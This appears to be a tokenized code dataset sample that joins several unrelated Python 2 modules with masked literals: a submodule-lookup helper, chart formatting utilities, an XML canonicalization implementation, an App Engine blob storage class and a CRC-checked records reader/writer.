<s> import imp <EOL> import os <EOL> import sys <EOL> def module_has_submodule ( package , module_name ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT:.>" . join ( [ package . __name__ , module_name ] ) <EOL> try : <EOL> return sys . modules [ name ] is not None <EOL> except KeyError : <EOL> pass <EOL> for finder in sys . meta_path : <EOL> if finder . find_module ( name ) : <EOL> return True <EOL> for entry in package . __path__ : <EOL> try : <EOL> finder = sys . path_importer_cache [ entry ] <EOL> if finder is None : <EOL> try : <EOL> file_ , _ , _ = imp . find_module ( module_name , [ entry ] ) <EOL> if file_ : <EOL> file_ . close ( ) <EOL> return True <EOL> except ImportError : <EOL> continue <EOL> elif finder . find_module ( name ) : <EOL> return True <EOL> else : <EOL> continue <EOL> except KeyError : <EOL> for hook in sys . path_hooks : <EOL> try : <EOL> finder = hook ( entry ) <EOL> if finder . find_module ( name ) : <EOL> return True <EOL> else : <EOL> break <EOL> except ImportError : <EOL> continue <EOL> else : <EOL> if os . path . isdir ( entry ) : <EOL> try : <EOL> file_ , _ , _ = imp . find_module ( module_name , [ entry ] ) <EOL> if file_ : <EOL> file_ . close ( ) <EOL> return True <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> def AutoLegend ( chart ) : <EOL> """<STR_LIT>""" <EOL> chart . _show_legend = False <EOL> labels = [ ] <EOL> for series in chart . data : <EOL> if series . label is None : <EOL> labels . append ( '<STR_LIT>' ) <EOL> else : <EOL> labels . append ( series . label ) <EOL> chart . _show_legend = True <EOL> if chart . _show_legend : <EOL> chart . _legend_labels = labels <EOL> class AutoColor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . colors = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __call__ ( self , chart ) : <EOL> index = - <NUM_LIT:1> <EOL> for series in chart . data : <EOL> if series . style . color is None : <EOL> index += <NUM_LIT:1> <EOL> if index >= len ( self . colors ) : <EOL> index = <NUM_LIT:0> <EOL> series . style . color = self . colors [ index ] <EOL> class AutoScale ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , buffer = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> self . buffer = buffer <EOL> def __call__ ( self , chart ) : <EOL> """<STR_LIT>""" <EOL> if not chart . data : <EOL> return <EOL> min_value , max_value = chart . GetMinMaxValues ( ) <EOL> if None in ( min_value , max_value ) : <EOL> return <EOL> for axis in chart . GetDependentAxes ( ) : <EOL> if axis . min is not None : <EOL> min_value = axis . min <EOL> if axis . max is not None : <EOL> max_value = axis . max <EOL> buffer = ( max_value - min_value ) * self . buffer <EOL> for axis in chart . GetDependentAxes ( ) : <EOL> if axis . min is None : <EOL> axis . min = min_value - buffer <EOL> if axis . max is None : <EOL> axis . max = max_value + buffer <EOL> class LabelSeparator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , left = None , right = None , bottom = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . bottom = bottom <EOL> def __call__ ( self , chart ) : <EOL> self . AdjustLabels ( chart . left , self . left ) <EOL> self . AdjustLabels ( chart . right , self . right ) <EOL> self . AdjustLabels ( chart . bottom , self . bottom ) <EOL> def AdjustLabels ( self , axis , minimum_label_spacing ) : <EOL> if minimum_label_spacing is None : <EOL> return <EOL> if len ( axis . labels ) <= <NUM_LIT:1> : <EOL> return <EOL> if axis . max is not None and axis . min is not None : <EOL> maximum_possible_spacing = ( axis . max - axis . min ) / ( len ( axis . labels ) - <NUM_LIT:1> ) <EOL> if minimum_label_spacing > maximum_possible_spacing : <EOL> minimum_label_spacing = maximum_possible_spacing <EOL> labels = [ list ( x ) for x in zip ( axis . label_positions , axis . labels ) ] <EOL> labels = sorted ( labels , reverse = True ) <EOL> for i in range ( <NUM_LIT:1> , len ( labels ) ) : <EOL> if labels [ i - <NUM_LIT:1> ] [ <NUM_LIT:0> ] - labels [ i ] [ <NUM_LIT:0> ] < minimum_label_spacing : <EOL> new_position = labels [ i - <NUM_LIT:1> ] [ <NUM_LIT:0> ] - minimum_label_spacing <EOL> if axis . min is not None and new_position < axis . min : <EOL> new_position = axis . min <EOL> labels [ i ] [ <NUM_LIT:0> ] = new_position <EOL> for i in range ( len ( labels ) - <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> if labels [ i ] [ <NUM_LIT:0> ] - labels [ i + <NUM_LIT:1> ] [ <NUM_LIT:0> ] < minimum_label_spacing : <EOL> new_position = labels [ i + <NUM_LIT:1> ] [ <NUM_LIT:0> ] + minimum_label_spacing <EOL> if axis . max is not None and new_position > axis . max : <EOL> new_position = axis . max <EOL> labels [ i ] [ <NUM_LIT:0> ] = new_position <EOL> label_positions , labels = zip ( * labels ) <EOL> axis . labels = labels <EOL> axis . label_positions = label_positions <EOL> def InlineLegend ( chart ) : <EOL> """<STR_LIT>""" <EOL> show = False <EOL> labels = [ ] <EOL> label_positions = [ ] <EOL> for series in chart . data : <EOL> if series . label is None : <EOL> labels . append ( '<STR_LIT>' ) <EOL> else : <EOL> labels . append ( series . label ) <EOL> show = True <EOL> label_positions . append ( series . data [ - <NUM_LIT:1> ] ) <EOL> if show : <EOL> chart . right . min = chart . left . min <EOL> chart . right . max = chart . left . max <EOL> chart . right . labels = labels <EOL> chart . right . label_positions = label_positions <EOL> chart . _show_legend = False </s>
<s> """<STR_LIT>""" <EOL> _copyright = '''<STR_LIT>''' <EOL> _copyright += "<STR_LIT>" <EOL> _copyright += '''<STR_LIT>''' <EOL> from xml . dom import Node <EOL> from Namespaces import XMLNS <EOL> import cStringIO as StringIO <EOL> try : <EOL> from xml . dom . ext import c14n <EOL> except ImportError , ex : <EOL> _implementation2 = None <EOL> _attrs = lambda E : ( E . attributes and E . attributes . values ( ) ) or [ ] <EOL> _children = lambda E : E . childNodes or [ ] <EOL> else : <EOL> class _implementation2 ( c14n . _implementation ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , node , write , ** kw ) : <EOL> self . unsuppressedPrefixes = kw . get ( '<STR_LIT>' ) <EOL> self . _exclusive = None <EOL> if node . nodeType == Node . ELEMENT_NODE : <EOL> if not c14n . _inclusive ( self ) : <EOL> self . _exclusive = self . _inherit_context ( node ) <EOL> c14n . _implementation . __init__ ( self , node , write , ** kw ) <EOL> def _do_element ( self , node , initial_other_attrs = [ ] ) : <EOL> """<STR_LIT>""" <EOL> ns_parent , ns_rendered , xml_attrs = self . state [ <NUM_LIT:0> ] , self . state [ <NUM_LIT:1> ] . copy ( ) , self . state [ <NUM_LIT:2> ] . copy ( ) <EOL> ns_local = ns_parent . copy ( ) <EOL> xml_attrs_local = { } <EOL> other_attrs = [ ] <EOL> sort_these_attrs = initial_other_attrs [ : ] <EOL> in_subset = c14n . _in_subset ( self . subset , node ) <EOL> sort_these_attrs += c14n . _attrs ( node ) <EOL> for a in sort_these_attrs : <EOL> if a . namespaceURI == c14n . XMLNS . BASE : <EOL> n = a . nodeName <EOL> if n == "<STR_LIT>" : n = "<STR_LIT>" <EOL> ns_local [ n ] = a . nodeValue <EOL> elif a . namespaceURI == c14n . XMLNS . XML : <EOL> if c14n . _inclusive ( self ) or ( in_subset and c14n . _in_subset ( self . subset , a ) ) : <EOL> xml_attrs_local [ a . nodeName ] = a <EOL> else : <EOL> if c14n . _in_subset ( self . subset , a ) : <EOL> other_attrs . append ( a ) <EOL> xml_attrs . update ( xml_attrs_local ) <EOL> W , name = self . write , None <EOL> if in_subset : <EOL> name = node . nodeName <EOL> W ( '<STR_LIT:<>' ) <EOL> W ( name ) <EOL> ns_to_render = [ ] <EOL> for n , v in ns_local . items ( ) : <EOL> if n == "<STR_LIT>" and v in [ c14n . XMLNS . BASE , '<STR_LIT>' ] and ns_rendered . get ( '<STR_LIT>' ) in [ c14n . XMLNS . BASE , '<STR_LIT>' , None ] : <EOL> continue <EOL> if n in [ "<STR_LIT>" , "<STR_LIT>" ] and v in [ '<STR_LIT>' ] : <EOL> continue <EOL> if ( n , v ) not in ns_rendered . items ( ) and ( c14n . _inclusive ( self ) or c14n . _utilized ( n , node , other_attrs , self . unsuppressedPrefixes ) ) : <EOL> ns_to_render . append ( ( n , v ) ) <EOL> if not c14n . _inclusive ( self ) : <EOL> if node . prefix is None : <EOL> look_for = [ ( '<STR_LIT>' , node . namespaceURI ) , ] <EOL> else : <EOL> look_for = [ ( '<STR_LIT>' % node . prefix , node . namespaceURI ) , ] <EOL> for a in c14n . _attrs ( node ) : <EOL> if a . namespaceURI != XMLNS . BASE : <EOL> if a . prefix : <EOL> look_for . append ( ( '<STR_LIT>' % a . prefix , a . namespaceURI ) ) <EOL> for key , namespaceURI in look_for : <EOL> if ns_rendered . has_key ( key ) : <EOL> if ns_rendered [ key ] == namespaceURI : <EOL> pass <EOL> else : <EOL> pass <EOL> elif ( key , namespaceURI ) in ns_to_render : <EOL> pass <EOL> else : <EOL> ns_local [ key ] = namespaceURI <EOL> for a in self . _exclusive : <EOL> if a . nodeName == key : <EOL> ns_to_render += [ ( a . nodeName , a . value ) ] <EOL> break <EOL> elif key is None and a . nodeName == '<STR_LIT>' : <EOL> ns_to_render += [ ( a . nodeName , a . value ) ] <EOL> break <EOL> else : <EOL> raise RuntimeError , '<STR_LIT>' % ( key , namespaceURI ) <EOL> ns_to_render . sort ( c14n . _sorter_ns ) <EOL> for n , v in ns_to_render : <EOL> if v : self . _do_attr ( n , v ) <EOL> else : <EOL> v = '<STR_LIT>' <EOL> self . _do_attr ( n , v ) <EOL> ns_rendered [ n ] = v <EOL> if not c14n . _inclusive ( self ) or c14n . _in_subset ( self . subset , node . parentNode ) : <EOL> other_attrs . extend ( xml_attrs_local . values ( ) ) <EOL> else : <EOL> other_attrs . extend ( xml_attrs . values ( ) ) <EOL> other_attrs . sort ( c14n . _sorter ) <EOL> for a in other_attrs : <EOL> self . _do_attr ( a . nodeName , a . value ) <EOL> W ( '<STR_LIT:>>' ) <EOL> state , self . state = self . state , ( ns_local , ns_rendered , xml_attrs ) <EOL> for c in c14n . _children ( node ) : <EOL> c14n . _implementation . handlers [ c . nodeType ] ( self , c ) <EOL> self . state = state <EOL> if name : W ( '<STR_LIT>' % name ) <EOL> c14n . _implementation . handlers [ c14n . Node . ELEMENT_NODE ] = _do_element <EOL> _IN_XML_NS = lambda n : n . namespaceURI == XMLNS . XML <EOL> _LesserElement , _Element , _GreaterElement = range ( <NUM_LIT:3> ) <EOL> def _sorter ( n1 , n2 ) : <EOL> '''<STR_LIT>''' <EOL> i = cmp ( n1 . namespaceURI , n2 . namespaceURI ) <EOL> if i : return i <EOL> return cmp ( n1 . localName , n2 . localName ) <EOL> def _sorter_ns ( n1 , n2 ) : <EOL> '''<STR_LIT>''' <EOL> if n1 [ <NUM_LIT:0> ] == '<STR_LIT>' : return - <NUM_LIT:1> <EOL> if n2 [ <NUM_LIT:0> ] == '<STR_LIT>' : return <NUM_LIT:1> <EOL> return cmp ( n1 [ <NUM_LIT:0> ] , n2 [ <NUM_LIT:0> ] ) <EOL> def _utilized ( n , node , other_attrs , unsuppressedPrefixes ) : <EOL> '''<STR_LIT>''' <EOL> if n . startswith ( '<STR_LIT>' ) : <EOL> n = n [ <NUM_LIT:6> : ] <EOL> elif n . startswith ( '<STR_LIT>' ) : <EOL> n = n [ <NUM_LIT:5> : ] <EOL> if n == node . prefix or n in unsuppressedPrefixes : return <NUM_LIT:1> <EOL> for attr in other_attrs : <EOL> if n == attr . prefix : return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> _in_subset = lambda subset , node : not subset or node in subset <EOL> class _implementation : <EOL> '''<STR_LIT>''' <EOL> handlers = { } <EOL> def __init__ ( self , node , write , ** kw ) : <EOL> '''<STR_LIT>''' <EOL> self . write = write <EOL> self . subset = kw . get ( '<STR_LIT>' ) <EOL> if self . subset : <EOL> self . comments = kw . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> else : <EOL> self . comments = kw . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> self . unsuppressedPrefixes = kw . get ( '<STR_LIT>' ) <EOL> nsdict = kw . get ( '<STR_LIT>' , { '<STR_LIT>' : XMLNS . XML , '<STR_LIT>' : XMLNS . BASE } ) <EOL> self . state = ( nsdict , [ '<STR_LIT>' ] , [ ] ) <EOL> if node . nodeType == Node . DOCUMENT_NODE : <EOL> self . _do_document ( node ) <EOL> elif node . nodeType == Node . ELEMENT_NODE : <EOL> self . documentOrder = _Element <EOL> if self . unsuppressedPrefixes is not None : <EOL> self . _do_element ( node ) <EOL> else : <EOL> inherited = self . _inherit_context ( node ) <EOL> self . _do_element ( node , inherited ) <EOL> elif node . nodeType == Node . DOCUMENT_TYPE_NODE : <EOL> pass <EOL> else : <EOL> raise TypeError , str ( node ) <EOL> def _inherit_context ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> xmlattrs = filter ( _IN_XML_NS , _attrs ( node ) ) <EOL> inherited , parent = [ ] , node . parentNode <EOL> while parent and parent . nodeType == Node . ELEMENT_NODE : <EOL> for a in filter ( _IN_XML_NS , _attrs ( parent ) ) : <EOL> n = a . localName <EOL> if n not in xmlattrs : <EOL> xmlattrs . append ( n ) <EOL> inherited . append ( a ) <EOL> parent = parent . parentNode <EOL> return inherited <EOL> def _do_document ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> self . documentOrder = _LesserElement <EOL> for child in node . childNodes : <EOL> if child . nodeType == Node . ELEMENT_NODE : <EOL> self . documentOrder = _Element <EOL> self . _do_element ( child ) <EOL> self . documentOrder = _GreaterElement <EOL> elif child . nodeType == Node . PROCESSING_INSTRUCTION_NODE : <EOL> self . _do_pi ( child ) <EOL> elif child . nodeType == Node . COMMENT_NODE : <EOL> self . _do_comment ( child ) <EOL> elif child . nodeType == Node . DOCUMENT_TYPE_NODE : <EOL> pass <EOL> else : <EOL> raise TypeError , str ( child ) <EOL> handlers [ Node . DOCUMENT_NODE ] = _do_document <EOL> def _do_text ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> if not _in_subset ( self . subset , node ) : return <EOL> s = node . data . replace ( "<STR_LIT:&>" , "<STR_LIT>" ) . replace ( "<STR_LIT:<>" , "<STR_LIT>" ) . replace ( "<STR_LIT:>>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if s : self . write ( s ) <EOL> handlers [ Node . TEXT_NODE ] = _do_text <EOL> handlers [ Node . CDATA_SECTION_NODE ] = _do_text <EOL> def _do_pi ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> if not _in_subset ( self . subset , node ) : return <EOL> W = self . write <EOL> if self . documentOrder == _GreaterElement : W ( '<STR_LIT:\n>' ) <EOL> W ( '<STR_LIT>' ) <EOL> W ( node . nodeName ) <EOL> s = node . data <EOL> if s : <EOL> W ( '<STR_LIT:U+0020>' ) <EOL> W ( s ) <EOL> W ( '<STR_LIT>' ) <EOL> if self . documentOrder == _LesserElement : W ( '<STR_LIT:\n>' ) <EOL> handlers [ Node . PROCESSING_INSTRUCTION_NODE ] = _do_pi <EOL> def _do_comment ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> if not _in_subset ( self . subset , node ) : return <EOL> if self . comments : <EOL> W = self . write <EOL> if self . documentOrder == _GreaterElement : W ( '<STR_LIT:\n>' ) <EOL> W ( '<STR_LIT>' ) <EOL> W ( node . data ) <EOL> W ( '<STR_LIT>' ) <EOL> if self . documentOrder == _LesserElement : W ( '<STR_LIT:\n>' ) <EOL> handlers [ Node . COMMENT_NODE ] = _do_comment <EOL> def _do_attr ( self , n , value ) : <EOL> '''<STR_LIT>''' <EOL> W = self . write <EOL> W ( '<STR_LIT:U+0020>' ) <EOL> W ( n ) <EOL> W ( '<STR_LIT>' ) <EOL> s = value . replace ( "<STR_LIT:&>" , "<STR_LIT>" ) . replace ( "<STR_LIT:<>" , "<STR_LIT>" ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> W ( s ) <EOL> W ( '<STR_LIT:">' ) <EOL> def _do_element ( self , node , initial_other_attrs = [ ] ) : <EOL> '''<STR_LIT>''' <EOL> ns_parent , ns_rendered , xml_attrs = self . state [ <NUM_LIT:0> ] , self . state [ <NUM_LIT:1> ] [ : ] , self . state [ <NUM_LIT:2> ] [ : ] <EOL> ns_local = ns_parent . copy ( ) <EOL> other_attrs = initial_other_attrs [ : ] <EOL> in_subset = _in_subset ( self . subset , node ) <EOL> for a in _attrs ( node ) : <EOL> if a . namespaceURI == XMLNS . BASE : <EOL> n = a . nodeName <EOL> if n == "<STR_LIT>" : n = "<STR_LIT>" <EOL> ns_local [ n ] = a . nodeValue <EOL> elif a . namespaceURI == XMLNS . XML : <EOL> if self . unsuppressedPrefixes is None or in_subset : <EOL> xml_attrs . append ( a ) <EOL> else : <EOL> other_attrs . append ( a ) <EOL> W , name = self . write , None <EOL> if in_subset : <EOL> name = node . nodeName <EOL> W ( '<STR_LIT:<>' ) <EOL> W ( name ) <EOL> ns_to_render = [ ] <EOL> for n , v in ns_local . items ( ) : <EOL> pval = ns_parent . get ( n ) <EOL> if n == "<STR_LIT>" and v in [ XMLNS . BASE , '<STR_LIT>' ] and pval in [ XMLNS . BASE , '<STR_LIT>' ] : <EOL> continue <EOL> if n == "<STR_LIT>" and v in [ '<STR_LIT>' ] : <EOL> continue <EOL> if ( v != pval or n not in ns_rendered ) and ( self . unsuppressedPrefixes is None or _utilized ( n , node , other_attrs , self . unsuppressedPrefixes ) ) : <EOL> ns_to_render . append ( ( n , v ) ) <EOL> ns_to_render . sort ( _sorter_ns ) <EOL> for n , v in ns_to_render : <EOL> self . _do_attr ( n , v ) <EOL> ns_rendered . append ( n ) <EOL> other_attrs . extend ( xml_attrs ) <EOL> xml_attrs = [ ] <EOL> other_attrs . sort ( _sorter ) <EOL> for a in other_attrs : <EOL> self . _do_attr ( a . nodeName , a . value ) <EOL> W ( '<STR_LIT:>>' ) <EOL> state , self . state = self . state , ( ns_local , ns_rendered , xml_attrs ) <EOL> for c in _children ( node ) : <EOL> _implementation . handlers [ c . nodeType ] ( self , c ) <EOL> self . state = state <EOL> if name : W ( '<STR_LIT>' % name ) <EOL> handlers [ Node . ELEMENT_NODE ] = _do_element <EOL> def Canonicalize ( node , output = None , ** kw ) : <EOL> '''<STR_LIT>''' <EOL> if output : <EOL> if _implementation2 is None : <EOL> _implementation ( node , output . write , ** kw ) <EOL> else : <EOL> apply ( _implementation2 , ( node , output . write ) , kw ) <EOL> else : <EOL> s = StringIO . StringIO ( ) <EOL> if _implementation2 is None : <EOL> _implementation ( node , s . write , ** kw ) <EOL> else : <EOL> apply ( _implementation2 , ( node , s . write ) , kw ) <EOL> return s . getvalue ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : print _copyright </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . ext . blobstore . blobstore import BlobReader <EOL> from google . appengine . api import blobstore <EOL> from google . appengine . api . blobstore import blobstore_stub <EOL> from google . appengine . api import datastore <EOL> from google . appengine . api import datastore_errors <EOL> from google . appengine . api import datastore_types <EOL> from google . appengine . runtime import apiproxy_errors <EOL> from google . appengine . api . blobstore import blobstore_service_pb <EOL> __all__ = [ '<STR_LIT>' ] <EOL> _BLOB_CHUNK_KIND_ = "<STR_LIT>" <EOL> class DatastoreBlobStorage ( blobstore_stub . BlobStorage ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app_id ) : <EOL> """<STR_LIT>""" <EOL> self . _app_id = app_id <EOL> @ classmethod <EOL> def _BlobKey ( cls , blob_key ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( blob_key , blobstore . BlobKey ) : <EOL> return blobstore . BlobKey ( unicode ( blob_key ) ) <EOL> return blob_key <EOL> def StoreBlob ( self , blob_key , blob_stream ) : <EOL> """<STR_LIT>""" <EOL> block_count = <NUM_LIT:0> <EOL> blob_key_object = self . _BlobKey ( blob_key ) <EOL> while True : <EOL> block = blob_stream . read ( blobstore . MAX_BLOB_FETCH_SIZE ) <EOL> if not block : <EOL> break <EOL> entity = datastore . Entity ( _BLOB_CHUNK_KIND_ , <EOL> name = str ( blob_key_object ) + "<STR_LIT>" + str ( block_count ) , <EOL> namespace = '<STR_LIT>' ) <EOL> entity . update ( { '<STR_LIT>' : datastore_types . Blob ( block ) } ) <EOL> datastore . Put ( entity ) <EOL> block_count += <NUM_LIT:1> <EOL> def OpenBlob ( self , blob_key ) : <EOL> """<STR_LIT>""" <EOL> return BlobReader ( blob_key , blobstore . MAX_BLOB_FETCH_SIZE , <NUM_LIT:0> ) <EOL> def DeleteBlob ( self , blob_key ) : <EOL> """<STR_LIT>""" <EOL> blob_info_key = datastore . Key . from_path ( blobstore . BLOB_INFO_KIND , <EOL> str ( blob_key ) , <EOL> namespace = '<STR_LIT>' ) <EOL> try : <EOL> blob_info = datastore . Get ( blob_info_key ) <EOL> except datastore_errors . EntityNotFoundError : <EOL> raise apiproxy_errors . ApplicationError ( <EOL> blobstore_service_pb . BlobstoreServiceError . BLOB_NOT_FOUND ) <EOL> block_count = blob_info [ "<STR_LIT:size>" ] / blobstore . MAX_BLOB_FETCH_SIZE <EOL> block_set = [ ] <EOL> try : <EOL> while block_count >= <NUM_LIT:0> : <EOL> entity = datastore . Entity ( _BLOB_CHUNK_KIND_ , <EOL> name = str ( blob_key ) + "<STR_LIT>" + str ( block_count ) , <EOL> namespace = '<STR_LIT>' ) <EOL> block_set . append ( entity ) <EOL> block_count -= <NUM_LIT:1> <EOL> datastore . Delete ( block_set ) <EOL> datastore . Delete ( blob_info_key ) <EOL> except : <EOL> raise apiproxy_errors . ApplicationError ( <EOL> blobstore_service_pb . BlobstoreServiceError . BLOB_NOT_FOUND ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import struct <EOL> import google <EOL> from google . appengine . api . files import crc32c <EOL> BLOCK_SIZE = <NUM_LIT:32> * <NUM_LIT> <EOL> HEADER_FORMAT = '<STR_LIT>' <EOL> HEADER_LENGTH = struct . calcsize ( HEADER_FORMAT ) <EOL> RECORD_TYPE_NONE = <NUM_LIT:0> <EOL> RECORD_TYPE_FULL = <NUM_LIT:1> <EOL> RECORD_TYPE_FIRST = <NUM_LIT:2> <EOL> RECORD_TYPE_MIDDLE = <NUM_LIT:3> <EOL> RECORD_TYPE_LAST = <NUM_LIT:4> <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class InvalidRecordError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class FileWriter ( object ) : <EOL> """<STR_LIT>""" <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> class FileReader ( object ) : <EOL> """<STR_LIT>""" <EOL> def read ( self , size ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def tell ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> _CRC_MASK_DELTA = <NUM_LIT> <EOL> def _mask_crc ( crc ) : <EOL> """<STR_LIT>""" <EOL> return ( ( ( crc >> <NUM_LIT:15> ) | ( crc << <NUM_LIT> ) ) + _CRC_MASK_DELTA ) & <NUM_LIT> L <EOL> def _unmask_crc ( masked_crc ) : <EOL> """<STR_LIT>""" <EOL> rot = ( masked_crc - _CRC_MASK_DELTA ) & <NUM_LIT> L <EOL> return ( ( rot >> <NUM_LIT> ) | ( rot << <NUM_LIT:15> ) ) & <NUM_LIT> L <EOL> class RecordsWriter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , writer , _pad_last_block = True ) : <EOL> """<STR_LIT>""" <EOL> self . __writer = writer <EOL> self . __position = <NUM_LIT:0> <EOL> self . __entered = False <EOL> self . __pad_last_block = _pad_last_block <EOL> def __write_record ( self , record_type , data ) : <EOL> """<STR_LIT>""" <EOL> length = len ( data ) <EOL> crc = crc32c . crc_update ( crc32c . CRC_INIT , [ record_type ] ) <EOL> crc = crc32c . crc_update ( crc , data ) <EOL> crc = crc32c . crc_finalize ( crc ) <EOL> self . __writer . write ( <EOL> struct . pack ( HEADER_FORMAT , _mask_crc ( crc ) , length , record_type ) ) <EOL> self . __writer . write ( data ) <EOL> self . __position += HEADER_LENGTH + length <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> if not self . __entered : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> block_remaining = BLOCK_SIZE - self . __position % BLOCK_SIZE <EOL> if block_remaining < HEADER_LENGTH : <EOL> self . __writer . write ( '<STR_LIT:\x00>' * block_remaining ) <EOL> self . __position += block_remaining <EOL> block_remaining = BLOCK_SIZE <EOL> if block_remaining < len ( data ) + HEADER_LENGTH : <EOL> first_chunk = data [ : block_remaining - HEADER_LENGTH ] <EOL> self . __write_record ( RECORD_TYPE_FIRST , first_chunk ) <EOL> data = data [ len ( first_chunk ) : ] <EOL> while True : <EOL> block_remaining = BLOCK_SIZE - self . __position % BLOCK_SIZE <EOL> if block_remaining >= len ( data ) + HEADER_LENGTH : <EOL> self . __write_record ( RECORD_TYPE_LAST , data ) <EOL> break <EOL> else : <EOL> chunk = data [ : block_remaining - HEADER_LENGTH ] <EOL> self . __write_record ( RECORD_TYPE_MIDDLE , chunk ) <EOL> data = data [ len ( chunk ) : ] <EOL> else : <EOL> self . __write_record ( RECORD_TYPE_FULL , data ) <EOL> def __enter__ ( self ) : <EOL> self . __entered = True <EOL> return self <EOL> def __exit__ ( self , atype , value , traceback ) : <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> if self . __pad_last_block : <EOL> pad_length = BLOCK_SIZE - self . __position % BLOCK_SIZE <EOL> if pad_length and pad_length != BLOCK_SIZE : <EOL> self . __writer . write ( '<STR_LIT:\x00>' * pad_length ) <EOL> class RecordsReader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , reader ) : <EOL> self . __reader = reader <EOL> def __try_read_record ( self ) : <EOL> """<STR_LIT>""" <EOL> block_remaining = BLOCK_SIZE - self . __reader . tell ( ) % BLOCK_SIZE <EOL> if block_remaining < HEADER_LENGTH : <EOL> return ( '<STR_LIT>' , RECORD_TYPE_NONE ) <EOL> header = self . __reader . read ( HEADER_LENGTH ) <EOL> if len ( header ) != HEADER_LENGTH : <EOL> raise EOFError ( '<STR_LIT>' % <EOL> ( len ( header ) , HEADER_LENGTH ) ) <EOL> ( masked_crc , length , record_type ) = struct . unpack ( HEADER_FORMAT , header ) <EOL> crc = _unmask_crc ( masked_crc ) <EOL> if length + HEADER_LENGTH > block_remaining : <EOL> raise InvalidRecordError ( '<STR_LIT>' ) <EOL> data = self . __reader . read ( length ) <EOL> if len ( data ) != length : <EOL> raise EOFError ( '<STR_LIT>' % <EOL> ( length , len ( data ) ) ) <EOL> if record_type == RECORD_TYPE_NONE : <EOL> return ( '<STR_LIT>' , record_type ) <EOL> actual_crc = crc32c . crc_update ( crc32c . CRC_INIT , [ record_type ] ) <EOL> actual_crc = crc32c . crc_update ( actual_crc , data ) <EOL> actual_crc = crc32c . crc_finalize ( actual_crc ) <EOL> if actual_crc != crc : <EOL> raise InvalidRecordError ( '<STR_LIT>' ) <EOL> return ( data , record_type ) <EOL> def __sync ( self ) : <EOL> """<STR_LIT>""" <EOL> pad_length = BLOCK_SIZE - self . __reader . tell ( ) % BLOCK_SIZE <EOL> if pad_length and pad_length != BLOCK_SIZE : <EOL> data = self . __reader . read ( pad_length ) <EOL> if len ( data ) != pad_length : <EOL> raise EOFError ( '<STR_LIT>' % <EOL> ( len ( data ) , pad_length ) ) <EOL> def read ( self ) : <EOL> """<STR_LIT>""" <EOL> data = None <EOL> while True : <EOL> last_offset = self . tell ( ) <EOL> try : <EOL> ( chunk , record_type ) = self . __try_read_record ( ) <EOL> if record_type == RECORD_TYPE_NONE : <EOL> self . __sync ( ) <EOL> elif record_type == RECORD_TYPE_FULL : <EOL> if data is not None : <EOL> logging . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset ) <EOL> return chunk <EOL> elif record_type == RECORD_TYPE_FIRST : <EOL> if data is not None : <EOL> logging . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset ) <EOL> data = chunk <EOL> elif record_type == RECORD_TYPE_MIDDLE : <EOL> if data is None : <EOL> logging . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset ) <EOL> else : <EOL> data += chunk <EOL> elif record_type == RECORD_TYPE_LAST : <EOL> if data is None : <EOL> logging . warning ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset ) <EOL> else : <EOL> result = data + chunk <EOL> data = None <EOL> return result <EOL> else : <EOL> raise InvalidRecordError ( "<STR_LIT>" % record_type ) <EOL> except InvalidRecordError , e : <EOL> logging . warning ( "<STR_LIT>" <EOL> "<STR_LIT>" , last_offset , e ) <EOL> data = None <EOL> self . __sync ( ) <EOL> def __iter__ ( self ) : <EOL> try : <EOL> while True : <EOL> yield self . read ( ) <EOL> except EOFError : <EOL> pass <EOL> def tell ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __reader . tell ( ) <EOL> def seek ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . __reader . seek ( * args , ** kwargs ) </s>
